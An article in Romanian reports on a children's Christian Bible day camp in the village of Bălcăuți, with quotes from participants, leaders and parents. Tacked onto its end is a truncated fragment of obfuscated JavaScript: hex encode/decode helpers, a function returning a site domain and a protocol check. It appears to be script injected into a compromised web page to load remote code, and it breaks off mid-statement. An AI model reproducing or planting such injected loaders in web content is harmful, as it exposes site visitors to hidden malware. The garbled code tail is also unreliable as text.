Vacanță de vară cu folos în satul Bălcăuți

Vacanța de vară este o perioadă perfectă pentru tabere de zi. Copiii din satul Bălcăuți, raionul Briceni, în această săptămână au ocazia de a participa la o asemenea tabăra organizată în localitatea lor.

Tabara de zi Balcauti

Deja de trei zile tabăra continuă, timp în care s-au adunat aproximativ 35 de copii. Împreună am studiat cursul de studiu biblic inductiv ”Cum să faci alegeri pe care să nu le regreți?”, apoi copiii primeau temă pentru acasă. Majoritatea îndeplineau sârguincios tema și acest fapt ne încuraja mult. Cei micuți au învațat  cum a fost creat tot ceea ce ne înconjoară și despre promisiunea minunată a lui Dumnezeu.

Tabara de zi Balcauti

”Mi-a plăcut cel mai mult în această tabără lecția despre promisiunea lui Dumnezeu și versetul Ioan 3:16”, a menționat Ilona Denisova, participanta taberei.

La întrebarea liderului Sergiu Andreev: ”Ce v-a plăcut cel mai mult din ziua precedentă?”, copiii împreună au răspuns că nu jocurile, nu surpizele, ci: ”Istoria lui David.”

”Ceea ce îmi place cel mai mult la tabără este faptul că studiem despre Dumnezeu și aflăm tot mai multe lucruri noi despre El”, a afirmat un alt participant al taberei, Anton Viniatinskii.

Cum sa faci alegeri de care a nu regreti?

După timpul de studiere a Scripturii, împărțiți în echipe, copiii participau activ la jocurile sportive organizate. Echipa care câștiga, următoarea zi primea premii. Au fost premiați nu doar participanții echipei care au învins, dar și fiecare copil care învăța versetul biblic pe dinafară, cei ce îndeplineau tema de casă și cine invita măcar un prieten la tabără.

”Foarte interesante au fost jocurile și surprizele”, a spus Danu Ferco.

Tabara Balcauti surprize

Liderii, de asemenea, au rămas foarte mulțumiți și cu impresii deosebite:

”În această tabără mi-a plăcut unitatea colectivului, care, de obicei, rar se întâlnește. Aici regiunea este mică, de aceea copiii sunt foarte prietenoși între ei. Uneori glumesc, râd, dar, în principiu, copiii foarte serios s-au raportat la adevărurile Cuvântului lui Dumnezeu. Eu am oportunitatea de a lucra cu cei mai mici ucenici. Să fi văzut ochii lor, plini de  mare interes. Realizez faptul că ei multe lucruri poate nu le înțeleg și chiar nu pot pronunța corect cuvintele, dar vazând străduința lor, eu găsesc puteri și tot mai multă dragoste pentru ei”, a afirmat Alina Andreeva, unul dintre liderii taberei.

”Faptul care m-a impresionat cel mai mult la tabără este atitudinea serioasă a copiilor față de lecțiile biblice și că erau foarte activi în timpul jocurilor și cântărilor”, a menționat Natalia Faina, un alt lider al taberei.

Tabara Balcauti Jocuri

În timpul acestei tabere fiecare am observat cât de minunat binecuvântează Dumnezeu această slujire. În fiecare zi veneau tot mai mulți copii, părinți și Dumnezeu ne dăruia un timp frumos afară, chiar dacă cerul era înnourat și în localitățile din apropiere ploua. Chiar dacă am avut piedici, dar programul taberei a continuat excelent.

Un alt lucru minunat din timpul acestei tabere este încântarea părinților și a paznicului școlii de ceea ce vedeau că se desfășoară zilnic.

”Copiii așteptau cu nerăbdare următoarea zi a taberei și dimineața, cu o oră sau două înainte de începerea unei noi zi, ei deja se pregătesc să plece”, a menționat mama unui participant al taberei.

Un alt părinte a spus:

”E foarte bine că vă ocupați cu copiii, căci majoritatea părinților sunt ocupați, la muncă, în câmp și nu prea au timp pentru ei.”

Tabara de zi in Balcauti

Desfășurând tabăra pe teritoriul școlii, paznicul acestei instituții a avut oportunitatea de a fi împreună cu noi. Ne-a uimit mult interesul lui față de lecțiile biblice. Asculta cu o mare atenție și când unul dintre copii a plecat într-o parte, el a spus:

„Aici este o lecție atât de interesantă și nu pot să am grija voastră.”

Tabara de zi Balcauti

Ne bucurăm mult de acest timp minunat în care lucrăm cu generația viitoare, copiii de astăzi, semănând Cuvântul lui Dumnezeu în inimile copiilor acestui sat.

Tabăra din satul Bălcăuți va continua până sâmbătă, 18 iunie.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "moldovacrestina.md"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e